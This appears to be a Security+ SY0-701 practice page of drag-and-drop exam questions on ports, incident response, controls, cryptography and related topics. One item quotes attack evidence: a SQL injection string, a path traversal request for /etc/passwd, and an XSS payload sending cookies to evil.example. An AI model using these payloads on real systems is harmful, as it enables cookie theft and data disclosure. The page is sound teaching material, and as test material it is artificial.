Performance-Based Questions
The real exam usually opens with 2–4 performance-based questions. Drag each chip onto its target (or tap a chip, then tap a slot), then check your answers. Items are shuffled on every reset.
Match Ports to Protocols
Matching PBQDrag each port number onto the service that uses it by default.
SSH / SFTP
Secure remote shell and file transfer
DNS
Name resolution (UDP/TCP)
HTTPS
TLS-encrypted web traffic
RDP
Remote Desktop Protocol
LDAPS
LDAP over SSL/TLS
Microsoft SQL Server
Database engine traffic
Order the Incident Response Phases
Ordering PBQPlace the seven incident response activities in the order defined by the SY0-701 process.
Step 1
Step 2
Step 3
Step 4
Step 5
Step 6
Step 7
Identify the Attack from the Evidence
Matching PBQDrag each attack type onto the log entry or observation that indicates it.
Web server log
GET /product.php?id=1' OR '1'='1'-- HTTP/1.1
Auth log
One password attempt ('Winter2025!') against 400 different accounts within 10 minutes
Support ticket
Users report popups on the reviews page; page source contains <script>document.location='http://evil.example/c?'+document.cookie</script>
Web server log
GET /download?file=../../../../etc/passwd HTTP/1.1
NetFlow data
Massive inbound UDP from thousands of open NTP servers, all responses to requests the company never sent
Email gateway alert
Mass inbound mail from paypa1-security.example asking users to 'verify' their credentials
Classify the Security Controls
Matching PBQDrag each control type onto its real-world example.
Example
802.1X blocks unauthorized devices from connecting to the network
Example
SIEM raises an alert after correlating failed logins across servers
Example
Restoring the file server from last night's backup after ransomware
Example
'This facility is under 24/7 video surveillance' signs at every entrance
Example
Isolating an unpatchable legacy SCADA system on its own VLAN
Example
A policy requiring all staff to lock screens when leaving their desk
Order of Volatility (Forensics)
Ordering PBQA workstation is compromised. Order the evidence sources from MOST volatile (collect first) to LEAST volatile (collect last).
Collect 1st
Collect 2nd
Collect 3rd
Collect 4th
Collect 5th
Place the Security Appliance
Matching PBQDrag each technology onto the requirement it satisfies BEST.
Requirement
Block SQL injection and XSS against the public e-commerce site
Requirement
Check device posture (AV, patches) before granting LAN access
Requirement
Stop employees emailing files containing credit card numbers
Requirement
Aggregate and correlate logs from 200 systems with real-time alerting
Requirement
Detect and isolate malicious processes on laptops, with rollback
Requirement
Give admins one hardened, audited path into the server management VLAN
Classify the Authentication Factors
Matching PBQDrag each authentication factor category onto the concrete example that belongs to it.
Example
A password typed at the login prompt
Example
A TOTP hardware token that displays a rotating 6-digit code
Example
A fingerprint scanned to unlock a laptop
Example
Login allowed only when GPS places the user inside the home country
Match the Agreement to the Situation
Matching PBQDrag each agreement type onto the contracting situation it fits BEST.
Situation
A consultant will see trade secrets and must be legally barred from disclosing them
Situation
The cloud provider must guarantee 99.99% uptime with penalties for missing it
Situation
Two companies expect many future projects and want one umbrella contract covering the general terms for all of them
Situation
A document defines the specific deliverables, timeline, and milestones for one penetration test engagement
Situation
Two agencies sign a non-binding statement of intent to cooperate on threat intelligence sharing
Situation
Two firms formalize a partnership, defining each partner's responsibilities and how profits are divided
Pick the Right Cryptographic Tool
Matching PBQDrag each cryptographic technique onto the requirement it satisfies BEST.
Requirement
Verify a downloaded file has not been altered in transit
Requirement
Encrypt terabytes of data at rest with minimal performance impact
Requirement
Exchange a secret key with a stranger over an untrusted network
Requirement
Prove a message came from the sender, who cannot later deny sending it
Requirement
Replace stored credit card numbers with substitute values that have no mathematical relationship to the originals
Requirement
Stop attackers from cracking a stolen password database with precomputed rainbow tables
Order Wireless Security from Weakest to Strongest
Ordering PBQArrange the wireless security protocols from WEAKEST (place first) to STRONGEST (place last).
Step 1
Weakest
Step 2
Step 3
Step 4
Strongest
Order the Risk Management Steps
Ordering PBQArrange the risk management activities in the order they are performed.
Step 1
Step 2
Step 3
Step 4
Step 5
Order the Firewall Rules Correctly
Ordering PBQFirewalls evaluate rules top-down and stop at the FIRST match. Arrange the rules so specific blocks come before broader allows, and the catch-all deny lands last.
Step 1
Evaluated first
Step 2
Step 3
Step 4
Evaluated last
Pick the Best Log Source
Matching PBQAn incident responder needs answers. Drag each log or data source onto the investigative question it answers BEST.
Question
Which internal hosts contacted the malicious domain?
Question
What exact data left the network in that session?
Question
Which process spawned the suspicious executable?
Question
Whose credentials were used at 03:12?
Question
Was there a beaconing pattern of small periodic connections?
Question
Which port did the attacker connect to on the DMZ server?
Order the Change Management Process
Ordering PBQArrange the change management activities in the order a well-run organization performs them.
Step 1
Step 2
Step 3
Step 4
Step 5
Step 6
Match the Data Role
Matching PBQDrag each data governance role onto the description that defines it.
Description
Senior executive accountable for a data set who classifies it and decides who may access it
Description
Organization that determines the purposes and means of processing personal data
Description
Third party that processes personal data only on the controller's documented instructions
Description
IT staff who implement the day-to-day protections: backups, permissions, encryption
Description
The individual person whom the personal data identifies or describes
Order the Certificate Lifecycle
Ordering PBQArrange the steps of a TLS server certificate's lifecycle in the order they occur.
Step 1
Step 2
Step 3
Step 4
Step 5
Step 6
Order the Vulnerability Management Cycle
Ordering PBQArrange the vulnerability management activities in the order they are performed in one cycle.
Step 1
Step 2
Step 3
Step 4
Step 5
Step 6
Name That Social Engineering Attack
Matching PBQDrag each social engineering attack onto the scenario that describes it.
Scenario
A spear-phishing email crafted specifically for the CFO references her upcoming board meeting by name
Scenario
A caller claiming to be from the bank's fraud department asks an employee to read back a verification code over the phone
Scenario
An attacker invents a story about being a new IT auditor to convince the receptionist to share the visitor access procedures
Scenario
Attackers compromise an industry association website they know the target company's engineers visit daily
Scenario
Users who mistype the company domain as 'examp1e.com' land on a fake login page that harvests credentials
Scenario
An email from the CEO's actual compromised account instructs accounting to urgently wire funds to a new supplier
Pick the Hardening Technique
Matching PBQDrag each hardening technique onto the risk scenario it addresses BEST.
Risk
Users keep downloading and running unapproved executables that turn out to be malware
Risk
A vulnerability scan shows Telnet and an old FTP daemon listening on servers where nobody uses them
Risk
New network cameras still accept the factory admin/admin login printed in the vendor manual
Risk
A sales laptop containing customer records is stolen from a parked car
Risk
Once inside the flat network, malware spreads laterally by connecting directly to workstations' open ports
Risk
Workstations ship with preinstalled trial apps and games that nobody patches, expanding the attack surface
Order the 802.1X Authentication Flow
Ordering PBQA laptop plugs into a port protected by 802.1X. Arrange the steps of the authentication flow in the order they occur.
Step 1
Step 2
Step 3
Step 4
Step 5
Step 6
Who Secures What in the Cloud
Matching PBQUnder the cloud shared responsibility model, drag each responsibility onto the scenario it would have addressed. Note who holds each duty — provider or customer — depending on the service model.
Scenario
An intruder tailgates into the cloud region's server building and reaches the racks
Scenario
A VM-escape vulnerability in the virtualization layer lets one tenant read another tenant's memory
Scenario
A company's IaaS Linux VMs are compromised through a kernel flaw fixed by an update nobody installed
Scenario
An app the team built on a PaaS platform is breached through a SQL injection flaw in its own code
Scenario
A terminated employee logs into the SaaS CRM months later because the account was never disabled
Scenario
Sensitive records were uploaded to a public bucket because nobody had labeled the data as confidential
Identify the Wireless Attack
Matching PBQDrag each wireless attack onto the evidence that indicates it.
Evidence
A second AP broadcasts the corporate SSID with a stronger signal, and users who join it are shown a fake captive portal asking for credentials
Evidence
A site survey finds an unauthorized consumer Wi-Fi router plugged into a live wall jack in a conference room, bridging into the corporate LAN
Evidence
A packet capture shows floods of spoofed 802.11 management frames repeatedly kicking clients off the WLAN, forcing them to reconnect
Evidence
Contacts and messages were silently copied from an executive's phone over a Bluetooth connection while she sat in an airport lounge
Evidence
Door logs show an employee's badge entering the building while that employee was verifiably abroad — the badge's data had been copied to a duplicate card
Evidence
All Wi-Fi channels in the warehouse show a constant wall of RF noise and every wireless device loses connectivity at once
Order the TLS Handshake (simplified)
Ordering PBQA browser opens an HTTPS connection. Arrange the simplified TLS handshake steps in the order they occur.
Step 1
Step 2
Step 3
Step 4
Step 5
Match the Physical Control
Matching PBQDrag each physical security control onto the purpose it serves BEST.
Purpose
Stop tailgating by allowing only one authenticated person through a two-door chamber at a time
Purpose
Prevent a vehicle from ramming through the building entrance
Purpose
Block all radio signals from entering or leaving the forensics lab where seized phones are examined
Purpose
Keep the industrial control network physically disconnected from any other network, including the internet
Purpose
Detect an intruder's footsteps crossing the floor of a restricted area after hours
Purpose
Provide a human who can verify IDs, challenge suspicious behavior, and adapt to situations no automated control anticipates
Order the Forensic Investigation
Ordering PBQA digital forensic investigation begins after a suspected breach. Arrange the activities in the order they are performed.
Step 1
Step 2
Step 3
Step 4
Step 5
Step 6
Match the Tool to Its Function
Matching PBQDrag each security tool onto the one-line description of what it does.
Function
Aggregates and correlates logs from across the environment to surface security alerts
Function
Runs automated playbooks that respond to alerts without waiting for a human analyst
Function
Monitors endpoint processes and behavior, and can isolate a compromised host
Function
Baselines normal user and entity behavior and flags anomalies like a 3 a.m. mass download
Function
Inspects outbound data and blocks sensitive content from leaving the organization
Function
Watches critical system and configuration files and alerts when their hashes change